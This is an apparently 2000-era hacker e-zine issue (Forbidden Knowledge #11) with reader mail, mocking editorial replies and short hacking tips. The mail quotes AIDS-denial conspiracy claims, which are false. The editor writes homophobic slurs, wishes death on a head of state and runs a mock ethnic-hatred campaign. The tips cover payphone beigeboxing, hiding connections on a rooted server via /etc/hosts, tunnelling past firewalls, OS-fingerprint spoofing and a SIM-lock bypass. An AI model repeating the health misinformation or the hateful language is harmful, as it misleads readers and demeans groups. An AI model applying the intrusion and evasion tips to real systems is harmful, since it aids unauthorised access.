ignorance: [Wizdumb: No, wait, I've learnt that this man is a pompous butthead. That's something I suppose.] Just because AIDS is real - and believe me, it is - does not mean that the "conventional" wisdom about its origins is true. MANY people have tested negative for HIV and died of AIDS. MANY people have tested positive for HIV and never been sick. Just look at the case of a certain famous American basketball star, who has been positive for most of a decade...and has yet to be sick. [ Exiting due to signal SIGSTUPID Excessive Stupidity Fault at eip=64756D62 ] Shit, man - read for yourself and make an informed decision: http://www.virusmyth.com/aids/index.htm [Wizdumb: Well, I really hate to have to be the one to tell you this, but I guess some-one has to break it to you: The web is the biggest, most widely-accessible source of *bullshit* information on this planet - I wouldn't touch it with a ten-foot barge-pole, let alone believe anything I read on it.] Better yet, apply a little logic: The US Military announces in 1970 that it wants "...a synthetic biological agent...that does not naturally exist, and for which no natural immunity could have been aquired." "Most important(ly) ... is that it might be refractory to the immunological and therapeutic processes upon which we depend to maintain our relative freedom from infectious diseases." (91st Congress, Appropriations hearings for Dept Defense, 1970 Dr MacArthur) >>>He guesses that within 5 to 10 years such an agent would be possible<<< >>>That puts it right about 1980....<<< Next, the "gay plague" occurs in New York and other large American cities among sexually active young men, who suddenly have a host of infections more common to organ transplant patients whose immune systems have been artificially suspended. Within a few years, a PRESS CONFERENCE announces a new study by Dr Gallo which WILL PROVE (when it is published) that a new retro-virus is the cause of GRIDS (Gay-Related Immune Defficiency Syndrome). [Wizdumb: Aaah. I see it now. Let's have promiscous sex with lots of women and shoot all those goddamn disgusting fags. That sounds like a plan.] The paper is never published in a peer reviewed paper. A version is finally released, but it does not come close to proving the simple HIV virus could cause ANY immune supression, much less the complete collapse of the system...it relies instead on a tiny sample of donors who have a high co-relation (Many have HIV particles in their blood, and also have AIDS.) No one from a control group is even tested for the virus, since the antibody test is not yet perfected and the other tests are so expensive. METAPHOR: [Wizdumb: Oh dear.] SO - the military announces it will have a supersonic aircraft: The citizens of a town near an airbase hear sonic booms - CONCLUSION: the Air Force probably has supersonic aircraft! APPLICATION OF METAPHOR: So- the military announces that it wants an immunity-killer: people start dying of AIDS - CONCLUSION: maybe they were serious, maybe they did come up with something! [Wizdumb: OMG! That was amazing! Thankyou for your wonderful metaphor to explain this to me - I wouldn't have known wtf you were on about otherwise!] But how do they hide it? Any doctor not on their payroll is capable of publishing a report of the real pathogen and showing that is is obviously an artificial organism with big, fat splices in its DNA... But let me ask you - who is looking for the cure to poliio today? NO ONE. [Wizdumb: *GASP* No? ] After all, we know what casues polio. There's a vaccine. [Wizdumb: *Phew* ] Who would look for the cause of a disease which is already found? WHERE IS THE HIV VACCINE? [Wizdumb: *GASP* You HAVE to stop scaring me like this! ] 20 years later, still no vaccine. Lots of evidence that anti-AIDS chemotherapy was deadly during the 1980's and 1990's, but NO VACCINE! Something does not add up, my friend...your president might not be so fucking stupid after all; you did say he has medical experience, right? [Wizdumb: No, I was employing a device known as sarcasm. You should try to start picking it up better if you want to try communicate with your species some time.] HOW MANY HOSPITALS HAVE YOU WORKED IN? [Wizdumb: None, obviously enough. But my idiocy is only inflicted on a small group of depraved hax0rs who never get laid anyway and thus don't need to worry. If I were president, I could do a significantly greater amount of damage with my opinions. And anyway, is my 0 years experience any less relevant than Thabo Mbeki's 0 years experience? No. I didn't think so.] (And where in the hell did you get the "1/3 of Earth has HIV" shit? If anything is proof of what Mbeki says, that would be it...think about it! We would all be dying or know someone personally who is...) Drew [Wizdumb: My figures were obviously exaggerated. However, I *DO* personally know somebody with AIDS and *two* with HIV. Maybe you don't know anyone with AIDS because your only friend is your mom and you spend all your time sending long obnoxious e-mails to people who really couldn't care less what the fuck you think?] -----*****-----******----- From: "David Knapp" To: Date: Tue, 16 May 2000 14:06:56 -0700 Subject: e-zine question Sorry for being a dumb 'merican - but I have a question about the BMW unlocking procedure. What is the "boot" on a BMW? I am unfamiliar with that term. ta dbk [Wizdumb: LOL, I wasn't actually aware that this was a South-African-ism. Sorry - it's the "trunk" :) Hmmm... I think I could have quite a lot of fun if I developed a huge vocabluary of South-African-specific slang, and then wrote an article on explosives. :P ] -----*****-----******----- From: Frits Haas To: wizdumb@leet.org Date: Thu, 18 May 2000 05:00:24 -0700 Subject: re : fk11 / C/Khaos magick greetz ...Rabbit here... i was quite interested in what u guys had on Chaos magick...although very simplified indeed i've been studying Magick for about 6 years now...more Wicca than anything else... [Wizdumb: Captain, my tree-hugging hippy radar is going wild :)] ....and if u would like me to contribute anything...gimme a shout (but do not ..*repeat* do not inform Vortexia...he'll 1) blow a vein in his head 2) swear for 1/2 an hour without repeating a word 3) vow to kill me 4) vow to hax0r me (*try* to anyway - lets not go there) 5) etc etc ...i'm sure u know the story by now... [Wizdumb: Not really, but, HEY VORT, Did you hear what this guy said about your mom?!! Are you gonna let him get away with that?!@#$%^] although i do not practise Chaos..(i think it's very dangerous)..i know quite alot about it and of ppl that have burnt their hands on it...(it's more dangerous than u think...) [Wizdumb: So I've heard. Personally, I keep my Chaos in the fridge, and then only warm it up marginally in the microwave. I've always been one to play it safe when it comes to this crazy supernatural stuff. :P] Wicca on the other hand is (in some ways) similar ..and (in other ways) opposite [Wizdumb: Aaah.] my personal book of shadows contains about 2900 pages...and i have not yet begun to collect other BOS...this is just my own dealings... [Wizdumb: *My* Book of Shadows is 0 pages, I have not yet begun to collect my work - this is only what my cat has done.] anyway... kewl zine dude...keep up the l33t work [Wizdumb: Glad ya like it. Keep reading, when the new zine comes out, bro. :)] regards, Rabbit aka Frits bright blessings and merry part -----*****-----******----- From: "k-rad-bob" To: Subject: h0h0! Date: Sun, 21 May 2000 23:45:47 +0200 reading fk11 almost made me ejaculate in my pants (i read it at work of course) and i simply had to email you guys. [Wizdumb: Are you implying that you don't wear pants when not at work?] b0g loves you!!!!! [Wizdumb: We love b0g!!!! :)] since you guys are so lovable i'll add fk to the zines section (when im bothered that is, im pretty lazy/buzy these days) til then, have fun and strangle a Turk! oh, and by the way: FUCK OFF!#@! yours in cyberspace k-rad-bob [Wizdumb: Fuq j0o!@#$ We officialy return j0r wage of war, and are giving full priority to the destruction of b0g. Not only will we 0wn b0g.org, but we will 0wn b0g.org. Furthermore, we will 0wn b0g.org. We have also started a b0g mirror at www.mdma.za.net/b0g solely to deface it at a later date - 0h0h0h0] -----*****-----******----- Date: Tue, 23 May 2000 16:06:14 -0700 (PDT) From: Richie Hasting To: wizdumb@leet.org Subject: greets Wyzewun fellow telkom h8terz X-Mailer: Excite Inbox X-Sender-Ip: 196.22.171.126 Hiya greets form a phreaker,hacker in ZA your info is hardcored but I have even more 2 add like how 2 remoteley controll a ISP's pop servers power remoteley as well as how to phreak fone linez of people living in flats, and how 2 cover ones tracks. I ALSO HAVE KNOWLEDGE IN THE CELLULAR INDUSTRY USING SOCIAL ENGENEERING SKILLZ TO GET WHAT I want. [Wizdumb: OMG! This is my favourite type of e-mail! The type where you just sit and wonder what the FUCK the dildo on the other side is trying to get across to you. Sometimes, late at night, you can read over them and they almost make sense - granted that you've had a good few shots of vodka prior to reading that is. Regardless, these rock - send more please.] I am currently in the process of cloning telephone cards but only one problem I NEED @ OBTAIN A TELKOM GREEN PHONE card machine as i NEED THE READER, have u any ideas 2 break the green bastard open and get the insides (die binne goed) out.... [Wizdumb: Okay, I have now established that the writer is Afrikaans, so should I forgive him for not being able to speak English? Hmmm... Naah, if his English sucks this much then he should've written to me in Afrikaans for crying out loud.] Pls email me to get more info outa me, if u don't email me I'll think I am not 3l33t3 enuff. [Wizdumb: Guess yer not "3l33t3" enuff, eh?] Regards Naz-t1 also known as naz-1 eail me... Cheerz [Wizdumb: *Sigh* I hate this job... When is that transfer coming through?] NO CARRIER @HWA As a sort of homage, here is issue #11, the final release of FK for the archives. - Ed ===---===---===---===---===---===---===---===---===---===---===---===---===--- : ____ i..?W$$$$$$$ __ ;Q$$P" $$$ ;$$$ .$$$;' $$$ I$$$ I$$. : $$$ $$$; ;$I? . $$$ _..$$$; $$$; $$$y#Q$$$$$P' $$$ $$$P""^^ _____$$$ $$$; $$$$$$$$$$$$$$ `$$$y, ''^""$$$^^"""" ;,"?$$$#, $$$ I$# ^$$$$, $$y, $$$ ?$$$; $$$; $$$ ;$$$I : $$$ $$$$ . $$$$ Forbidden Knowledge Issue Eleven: Released 16th May 2000AD Leet0 Wizdumb's 17th Birfday Ish!@#$% Happy Birfday to Me!@#$%^ ---===---===---===---===---===---===---===---===---===---===---===---===---=== Shout Outz +-======-+ MDMA, Sigma, DrSmoke, TimeWiz, meiso, Coldblood, Rawhed, JungleG, RIFT, {}, Slash, b0f, Most of the hoez from Blabber.Net's #hack (Aragon, Opium, acid, xanex, et al), Pushers who give LSD to Five Year Olds, Cruciphux, Gevil, All the blasphemers from article 0x45, Catholic School Girls that give good head Fuck Youz +-=====-+ Catholic School Girls that DON'T, People who can't see the humour in the abuse of homeless people, Homeless People, All the hoez in the acne remedy commercials with no acne, *!*@dal.net, *!*@under.net, People who wait until the *END* of the answering machine message before they hang up, Defacers, People who think defacers have skillz, People who write e-zines, People who think people who write e-zines have skillz, Loud Annoying Evangelical Churches, kppp users, Broccoli Movies of the Month: American Beauty South Park - Bigger, Longer and Uncut Sites of the Month: Info Regarding Egodeath hv2k.voltage.org My Personal FK Mirror www.mdma.za.net/fk H/P E-Zine Community scene.textfiles.com Narq of the Month: MostHateD (Congradulations!@#$%^&) Windoze 9x command of da month: copy /Y c:\windows\logos.sys c:\logo.sys Short Story of the Month: "The Doom that came to Sarnath" by HP Lovecraft Fun: Walking out the plane in Zimbabwe's airport wearing a T-Shirt that says "Whites rule. The Zimbabwean government is hiding the aliens from us. Gay Rights now." Official FK11 Soundtrack: KoRn, Limp Bizkit, Rage Against the Machine, Bush, Eminem, Red Hot Chilli Peppers, Rammstein, Pixies, Springbok Nude Girls, Radiohead, Bloodhound Gang, Our Lady Peace, Cypress Hill, Blink182, Orgy Scary: Seeing an automatically flushing urinal for the first time ever just after eating Psilocybe Mushrooms Oh: If you have copies of Forbidden Knowledge printed out and lying in your office's waiting room like we have heard several people have - PLEASE PLEASE PLEASE take a photo of them and your waiting room, scan them in, and e-mail them to wizdumb@leet.org ;-) Don't have a scanner? E-mail us for a snail mail addy, but just GET US THOSE PICTURES. =) Amusing: Thabo Mbeki's public statement (and letter to Bill Clinton) saying that it can't be proved that HIV leads to AIDS - especially considering how much goddamn medical experience he has. And lets not even *begin* to consider the amount of damage a statement like that can cause when almost a *third* of the world is HIV positive. Thabo Mbeki, I sincerely hope that you get AIDS and die. I am actually *ashamed* to have such a fucking idiot as a president. ________,,,........... .........______ $$$$$$$$$˝˝˝˝˝˝˝^^^^^ '''''"""???zz. $$ ^?$$$ `?; $$ '$$ Contents of Forbidden Knowledge Issue 11 $;$$$ ?; ,,?;I$$$ ,"________________________________________________________..,,##˝˝˝', $$ _.+ +.,; 0x90> Credits 0x90> Editorial 0x90> Mail from the Readers Articlez... 0x30> Byteware of the Month [Wyze1, Jus, DvD] 0x31> Unlocking Cellphones without the Mastercode [Moe1] 0x32> Hacking Reality: An Introduction to Khaos Magick [Wyzewun] REM 0x33> Details of Microsoft's Space Exploration Plan [Pneuma] 0x34> K-Rad Oh-Day Christianity Warez [Various] 0x35> Cisco PIX (and others) Denial of Service Attack [Vortexia] 0x36> An Introduction to Java Servlets [Wyzewun] 0x37> Fixing M-Web Specific Modems [JungleG] 0x38> Miscellaneous IRC Gayness [Various] Other junk... 0x41> The Mysterious blommetjies.jpg (Zoom In :P) [Wyzewun] 0x42> Completely Useless killmod.php3 Warez [Wyzewun] 0x43> Internet Explorer 4/5 Hostile VBScript [Wyzewun] 0x44> Share Password Extractor Version 2 [Sigma] 0x45> Microsoft Access 97 Database Password Remover [Wyzewun] 0x46> Lame Ass Win9x/NT4 Backdoor [Wyzewun] 0x47> Windoze Dialup Account Login Ripper [Sigma] 0x48> B0nus Super-el8 Esteban Warez [Various] 0x49> MDMA Advisories #2 through to #4 [Wyzewun] 0x50> Various Stupid-ass DoS vulnerabilties [Wyzewun] 0x90> Outro ,?' $$; $$$QQQ####,,,,________________________________ _________ ______ _ __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. People who made this Issue possible ._ ,;:;,, _. The Usual Bitchez who contributed... -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ Wyzewun Pneuma Vortexia Moe1 Jus Special Thanx to Deeze Guest Bitchez... -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- JungleG Sigma DvD ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; ^^^^^^^^^"""""" __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Editorial by Wizdumb ._ ,;:;,, _. So last week me and my bitchez... ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Mail from The Readers ._ ,;:;,, _. Date: Tue, 4 Apr 2000 08:43:39 -0500 (CDT) From: Al Mccain To: wizdumb@leet.org Subject: got a question about someone.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII sigma, where is he from? think i know him, just not sure. [Ed: I replied with "Huh? Who are you?" and I kinda never heard from him again, HEH! ;-P Still - mail like this worries me.] ------ [Ed: I posted something to scene.textfiles.com to the effect of "Forbidden Knowledge Issue One to Ten released, but we were too dumb to notice" and got the following reply...] X-Authentication-Warning: lala.navpoint.com: mogel owned process doing -bs Date: Fri, 7 Apr 2000 15:55:38 -0500 (EST) From: mogel X-Sender: mogel@lala.navpoint.com To: Wyzewun Subject: FK and scene.textfiles.com In-Reply-To: <200004071104.EAA31560@nak.dreamhost.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII I'm glad you wrote me, I tried to contact you like two months ago, but those addresses bounced back. I added you folks to the site... feel free to shoot me an email whenever you guys release, and I'll announce it on my site. You might consider making a mailing list to announce whenever there's a release to readers, or something. Keep in touch. -Mogel [Ed: More about this at the end of the zine] ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Byteware ._ ,;:;,, _. Byteware from Wyzewun... When beigeboxing a South African cardphone, you are interested in one of the white wires and the blue wire, okay? ------ Telkom's new boxes look like this... ___________ / () \ ------------- | ___ | | \ \ | | \__\ | | OOO | | OOO | | OOO | | | | | ,,,,,,,,,,|___________|,,,,,,,,,, Okay, so my ascii art sucks (I guess I shoulda gotten Cyberphreak to draw this) but what the fuck. Regardless, they're tall and thin, and are opened at the top using the little hole which I pathetically tried to depict. ;-P It appears that these boxes are Telkom's new preffered system, and they are worth finding ways to break into (That prefferably don't involve kicking the whole thing to pieces) - and if you succeed in breaking into one - write us an article on it!@#$% :-) ------ No-one sends fuck you'z to the FK editorial staff in their e-zines! We feel unimportant! Pleeze Pleeze Pleeeeze - you're not hardk0re if you don't have an el8 rival zine that hates you! :-( Actually, I have a feeling this approach isn't going to work. Hmm... Plan B... Phrack : FUCK YOU!@#$%^& BoW : FUCK YOU!@$%&^&* f41th : FUCK YOU!@#$% FK : FUCK YOU!#$#%^... No... Wait a Minute... b0g : FUCK YOU!#@$^&* b4b0 : FUCK YOU!@#$%&* ch4x : FUCK YOU!@$#%&( ~el8 : FUCK YOU!$#$^*(% HWA.HN : FUCK YOU!@##$%^$& NoU : TAKE 0FF J0R CL0THEZ!#@%%$&&* ------ Here's an *EXTREMELY* simple little patch for tcp_seq.h I wrote for FreeBSD (tested on 3.4-RELEASE, but should work on 2.2 - 4.0) to increase security and to stop nmap from recognizing the OS (which is the real reason I wrote it, the extra security offered is not really necessary :P). This just shows you how simply a TCP/IP fingerprint can be spoofed... Once extracted just run patch tcp_seq.h diff.file in /sys/netinet --- cut diff file here --- 96c96 < #define TCP_ISSINCR (122*1024 + tcp_random18()) --- > #define TCP_ISSINCR (random()) 100c100 < #define TCP_ISSINCR (250*1024) /* increment for tcp_iss each second */ --- > #define TCP_ISSINCR (random()) /* increment for tcp_iss each second */ --- cut diff file here --- ------ Looking through the logs on Pneuma's box I found this... Well, the buffer overflow examples are a little lame ... but, it actually seems okay at second glance. hehhehehehe, it usually is, it grows on you THough, I could see why you might have to try so hard -- it's on Windoze ...... whats on windows? The buffer overflow program example. heh, its aimed at newbies and compiles under *nix neway :P Well, it's also C++ ... cin >> of course checks for buffer overflows. *Sigh* I hate it when idiots try and make it look like *I'm* wrong... C:\temp>type gay.cpp #include void main() { char beer[5]; cin >> beer; } C:\temp>cl gay.cpp Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86 Copyright (C) Microsoft Corp 1984-1998. All rights reserved. gay.cpp Microsoft (R) Incremental Linker Version 6.00.8168 Copyright (C) Microsoft Corp 1992-1998. All rights reserved. /out:gay.exe gay.obj C:\temp>gay AAAAAAAAAAAAAAA GAY caused an invalid page fault in module at 00de:00414141. Registers: EAX=004089a0 CS=015f EIP=00414141 EFLGS=00010246 EBX=00530000 SS=0167 ESP=0063fe00 EBP=41414141 ECX=0000000a DS=0167 ESI=8162c000 FS=1a8f EDX=0076066f ES=0167 EDI=00000000 GS=0000 Gosh, EIP and EBP look a bit weird. *Sigh* Just because texts up to now have not mentioned buffer overflow related problems with cin and ifstream doesn't mean they don't exist. In fact, I am willing to *bet* that the buffer overflows in WinAMP's reading of playlists and Netscape Navigator's reading of prefs.js were both caused by improper use of an ifstream. This is also a huge problem because this is how *every* C++ course/tutorial tells programmers to use their ifstreams like that. Anyway, the real moral of the story - Fuck off and check your facts before you whine. ;-P ------ Some extracts from a recent e-mail to me from okby@b4b0.org which may be of interest to some hoez... Indeed we are still putting out the ezine. Sorry, but we've been off for awhile, mainly due to real life problems in everyones schedule. Real life comes before internet. Anyhow, we're back in business, and we're stronger than ever. (ps. if you have anybody else you know that would be interested in submitting anything to the ezine please let them know that we'll look at anything especially if it has something about social antics or programming in it. thnx.) ------ Pneuma and I have decided to chose some completely arbitary race to hate with a passion. We looked in an Atlas and found Andorra, a tiny little country between France and Spain with a population of about 2000, and decided that it would do well. Before we were completely unaware of the great threat of this nation, and now we have made the shocking discovery that They're everywhere! They're taking all our jobs! They're corrupting our way of life! First of all - you must know how to identify Andoranns so as to be able to persecute them at every possible moment. We have decided that they all, without doubt, have hair growing out their ears. You can also always tell an Andorran by their nose. We don't know exactly what *about* it, but we are sure this identification technique is also completely infallable. And boy oh boy, when an Andorran moves into your neighbourhood - you'll know about it! Your children will worship Satan, take drugs, and eat... starchy stuff! Things will go missing everywhere (The Andorrans are *born* thieves, they even steal their currency from France and Spain!) And we're not even going to *begin* talking about their SMELL! So - join the fight against Andorra before it's too late! Besides - it's fun saying "Oh yeah, well at least (X Racial Group) aren't as bad as the fucking ANDORRANS!" and everyone always assumes that comments about Andorrans relate to *their* racial group - whatever that may be. Oh, and if you live in Andorra, please, please, e-mail us. ;-P ------ Interesting fact of the month, as found in issue four of b0g... LONGEST PUBES Maoni Vi of Cape Town has hair measuring 32 inches from the armpits and 28 inches from her minge. Yeah! Gov-Boi's home town! Coincedence? I think not. ;-) Shjeesh, and ppl wonder why I keep on ripping off CT. :-P ------ Real-life quote of the month... Marcel, it says in this magazine that men like being anally fingered during sex. How should I approach Steve about this? ------ Don't want your Java to run on Microsoft VM's? Then instead of using this... public static void main(String[] args) { Use THIS... static void main(String[] args) { And it will work in anything except M$-made stuff. ;-) ------****------ Byteware from Jus... How to impress your lame linux buddies? If you haven't figured this one out yet, congratulations - I'm speechless. 'nix uses a file called /etc/hosts to identify known hosts for domain resolution, to prevent a full DNS lookup everytime that host or IP is used, or if a DNS lookup isn't suitable for that IP. Usually this will contain something like localhost resolving to 127.0.0.1 and your machines (static) IP and its hostname (obviously only if the machine has one) /etc/hosts ovverrides DNS lookups, so you can play cute games with it on your machine. For example, change 127.0.0.1's resolution from "localhost" to "whitehouse.gov". Telnet 127.0.0.1, login and voila - do a "who" and see yourself logged in from the whitehouse :P This can actually be very useful to hide your connections as many people will take what a "who" says at face value and not look any further into it - root a box, change your current IP's resolution in that machines /etc/hosts to your enemy next door, and telnet in and you appear to be connected from idiot.hostname.com's machine... now there's a thought... Obviously you can't use this very seriously - if you're smart enough to get that far you will realise that a netstat -na will show otherwise :P ------ Got any annoying network firewall you wanna sneak around? Well, if you aren't a prize circus clown then you may have already discovered the beauty of some simple code known as datapipe (src on www.security.za.net). Your usual network firewall will have basic things open like http (80) and ftp (21) allowed out, but not your favorite's like telnet (23), ssh (22) or irc (6667) - tsk, shame. Datapipe lets you setup a pipe for data coming in on one port to another port on another host - sounds interesting. You could run datapipe on a machine outside of your network to listen on port 80 or 21, and then pipe the connection to your irc server on port 6667, or even to the local machine's telnet or ssh port... gee, that was tough. You could then /server externalmachine.com 21 or telnet externalmachine.com 80, and the network firewall will allow the outgoing data stream, but the external datapipe will change the flow of data to where you really want it to go - deranged.blabber.net (6667) for example :) [Wyzewun: Yeh, BlabberNet is neat, pity about the gay IRCOps there though (Jus, Vortexia, TimeWiz) :P] You will get datapipe, use it and like it. Duh. ------****------ Byteware from DvD... In RedHat 6.0, users with uid 1000 or higher can execute 'shutdown -r now', which will cause the system to reboot and go into single-user mode. Oops. ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Cellphone Unlocking without the Mastercode by Moe1 ._ ,;:;,, _. This works on Nokia 21xx/31xx/51xx/81xx. This doesnt work on software version (5.04). First of all your PIN code must be on, then press C, arrow down, C, and hold until it clears display then press * and hold until it starts to blink then press * again and hold until it starts to blink then type 04*YOURPIN*YOURPIN*YOURPIN#. It should then say "PIN code changed" or something and the SIM card is now accepted. Note: Each time you turn your phone OFF it resets the lock, so this need to be done each time you'll turn your phone ON. ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Hacking Reality: An Introduction to Khaos Magick by Wyzewun ._ ,;:;,, _. As a practicing Chaote, I was very interested to have recently seen two articles regarding occult issues in what would strictly be called H/P e-zines. The two e-zines I am reffering to are b4b0 issue 9 and b0g issue 2, and the two schools covered being Khaos Magick and Satanism respectively. Both zines are available @ PSS should you be interested in checking them out some time. (http://packetstorm.securify.com/mag) So why did I see a need for another article on the subject? Well, Synner's article in b4b0, despite being quite good, left out a few very important points as to what Khaos Magick is all about. I will also try and throw as many of my personal opinions about Khaos Magick into this as possible, to make it interesting to people already familiar with the system. And ultimately, it's hard to summarize such a complex system in a single article - so read both anyway. ;-) As for reading the article in b0g on Satanism... well... I have to be honest - I found the entire original content insipid and stupid but the passages quoted directly out of Anton LaVey's Satanic Bible make it worth reading anyway, despite the typos. Especially considering that LaVey was influenced by Aleister Crowley and HP Lovecraft as were many of the early Khaos Magicians like Austin Osman Spare. And more importantly, regardless of that article, b0g has to be one of the funniest zines the H/P community have produced ever. Right. Now Let's get started... The alt.magick.chaos FAQ contains a menagerie of definitions of Khaos Magick, and I suggest you read them all should you be interested. But the one I am going to give you in this article comes from Joseph Max.555, who I think defines it quite well... Chaos Magick is currently the cutting edge of modern Ceremonial Magick. It largely grew out of the work of Austin Osman Spare, though it has been fractalized into many forms over the last 10 or so years. Chaos Magick emphasizes a personal, experimental approach to magickal practice, de-emphasizes "traditional" approaches (ie. GD, OTO, et al) especially as regards "secret knowledge", male/female dichotomies and order hierarchy; what can be learned from Masters or Gurus is far less important or effective than what a dedicated researcher can discover for hirself. As such, shamanism is incorporated more directly than such historical approaches as Kaballa, though most Chaotes are quite adept at examining traditional systems, incorporating what works and discarding that which holds no personal appeal. Chaos Magicians look at Magick as being a _living_ art rather than an _antique_ one. They regard the various belief structures of magick as being the _means_ rather than the _end_, and the most adept can alter their belief-state as easily as they change clothes. Chaos Magick recognizes no particular system of theology as having any more "reality" than any other, and most Chaotes (like Jung) approach dieties as being no more than archtypical constructs of the subconscious mind. Therefore they are far less concerned with having any (in their eyes) arbitrary moral system pounded into their skulls before getting to actually put magickal techniques into practical use than "Old Aeon" systems like the GD's or Abra-Melin. Chaos Magick propounds no particular dogma or moral system, beyond it's most common identifier: "Nothing is True, and Everything is Permitted." I have yet to meet, however, any adept Chaos Magician who doesn't have a strong sense of personal ethics and subscribe to it feverently. And in this one see's many of the points which Synner neglected to mention. But before even beginning to touch on those, I'm going to hop way back and give my personal definition of Magick in general for the benefit of those unfamiliar with such a concept beyond fairy-tale literature... Magick is the art of bending reality to one's will for whatever reason be it personal or so-called "god sent". Magick *has* to exist simply because so many people in so many different places practice it. And even should Magick *not* exist, *because* so many people practice it, it *does*. Why? Because Magick exists. Confused? Good. I have succeeded in wasting your time. Now let's move on... ;-) Now let's begin to look at approaches to Magick. Up to the point where Khaos Magick stepped into the world, Magick was approached largely from a traditional viewpoint. This means that Magick has been performed in manners passed down over generations, the original method of which was probably obtained from some-one who had ingested something hallucinogenic, was mildly insane, or perhaps actually had a very strong affinity with the supernatural. Of course, to a Chaos Magician (reffered to from here on as Chaotes), which one of these it was doesn't really matter in terms of effectivity. :) You see, most chaotes adopt Jung's concept of gods as archetypes of the subconscious mind. Thus the emphasis is not placed on *HOW* Magick should be performed, but on actually *MAKING* it happen. The Chaote acknowledges that an invocation to Homer Simpson can be just as effective and in some cases perhaps even more effective than one to a traditional deity. Also, which represents drunkeness better to you - Dionysus (ancient greek god of wine) or Barney from the Simpsons? I thought so. Now maybe you're whining that Barney isn't a "god", but to some extent, he IS, in that by you *thinking* of him as a god, he becomes so. Nothing needs to "exist" - it works anyway - which is why Chaos Magick is the only school to have Athiest magicians. :) In Conclusion, I would like to recommend that anyone interested in learning more about Magick and particularly Khaos Magick, should read the work of the following people who have written stuff in these fields... Psychology: Jung, Freud, Nietschze Occult: Peter Carrol, Austin Osman Spare, Anton LaVey, Aleister Crowley, Tzimon Yliaster, Phil Hine Fiction: Isaac Asimov (Esp. "The Last Question"), HP Lovecraft, JRR Tolkein Art and Theatre Movements: Surrealism, Constructivism, Dadaism, Absurdism, Existentialism, Expressionism And also check out the following URL'z... www.chaosmatrix.com www.crl.com/~tzimon www.occultsearch.com www.chaosmagic.com www.execpc.com/~discord/iot ds.dial.pipex.com/specularium Later this year, Pneuma and I will publish "Liber Tine" online, the book on our approach to Khaos Magick which we are writing. Until then, Cheers... ;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. K-r4d 0h-Day Chr1stian1tY War3z fr0m Var10uz ._ ,;:;,, _. We recieved divine inspiration from the following visitor to #5fm, who has bestowed upon us great wisdom which we shall cherish our entire life... --- BEGIN LOG --- * lee (lee@ABD7AD12.ipt.aol.com) has joined #5fm pn3um4, i h4ck3d n4s4 hello any christians out there??? helllloooooooo lee: I just ate them all, maybe tommorow :P lol keep religion out of this channel çîŕ€h mî héw çé hŕ€k BiNg_: YEAH!! huh? lee: I told you already, I Ate them all, try tommorow! no, GOD is everywhere!!!!!!!!!!!!!!!!!! pneuma, t34ch m3 h0w t0 h4ck!! ? Ok, enuff about religion b4 I make u cry what is wrong with you, why cry??? lee : go away to #god or something i worship Pneuma he is my gof he is my god never heard of him Opium: thats understandable i worship money shaim money................. * Pneuma is the god of good sex, beer, and evil computer trix lee : ja ... so leave. i dont bow down before anyone well, some day, when GOD comes, EVERYBODY will bow to me can you prove that bible oh yeah lee : GET THE HINT? # god JESUS MOWS MY LAWN!!!!!!!!!!!!! be carefull what you say!!!!!!!!!!!!!!!!!!!!!!! lee : or what? well, tonight i will pray for you and someday your'e eyes will open aaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaahh MY EEEEEEEEYYYYYEEEEEEEEEESS I'M BLIND Lee : yeah whatever...the aliens built us, or sum such shit why should i trust someone who took away to of my closest friends and then when i ask someone they say "god works in mysterious ways" BiNg_: yeah...explain that.. well, stop being stupid, you know the truth but you are to proud to admit it, why can't you just chat, that is all i want BOOM, (it's the voice of G.O.D) lee: *lick* Lee : isnt it prayer time or sumthing? are all of you from sa Yes, and proud of it, Better than being a dumb hippie american :P YAAAAAAAAAAAAAAAAAAAWN lee: WHO CARES? { sumbody plz kick him!!} i care also safrican who says it's a him religion is the world's best practical joke lee, are u gay? HEH! no, i am straight and i am a girl oh opium, wanna chat. nah --- END LOG --- So, inspired by the light of Jesus, we decided to 'grep -i' all our IRC logs for 'jesus' and 'christ' - the results of which looked something to the effect of this... In #b4b0 ... cause like christians are against alternate life styles * Topic is 'Let's party like we were at a christian suicide.' jesus christ. jesus h fucking christ jesus christ JESUS CHRIST jesus chr1st. jesus be in heaven I'm so sick of jesus jesus jesus jesus du0d jesus. jesus thats a stupid ploy. In #ch4x ... at a fucking club for christ's sake jesus jesus fuck In Blabber.Net's #hack ... christ Blu_J: CHRIST christ christ almighty hey christ man christ christ all fucking mighty christ.. i mean CHRIST! hmmm... all i want for christmas is my little cray, my little cray GEZUZ FUCKING CHRIST SUPERSTAR my oath to christ christ i wonder how fuqn ugly she was to go for someone lookin like u HOLY CHRIST Sega Dreamcast has 24mb ram!!!!!! for christ sake christ vort ;P teach some people here how tcp/ip works jus :P christ i use fbsd. christ everyone shutup christ i wonder whats going on. christ (: i know ipv4 better than the people who designed it. christ i am smurfing myself now. dood you are as pissed as a coloured on christmas eve jesus christ ack! christians! christ :P * opium was kicked by hotmetal (YOU DO NOT RUN NAMED FOR CHRISTS SAKE) christ jesus christ netscape is a piece of shit. jesus christ wget christ christ christ what a lame topic * Topic is 'Vortexia looks like Jesus' UglyKidJoe: jesus bru at least upgrade to OSR2. jesus c/s: 48867? jesus!@# jesus my modem cant do that Vortexia: hey wanker jesus wannabe jesus holy jesus jesus jesus, 40 sectors bad jesus jesus jesus christ JESUS CHRUST jesus d00ds, so god damn what if we like the 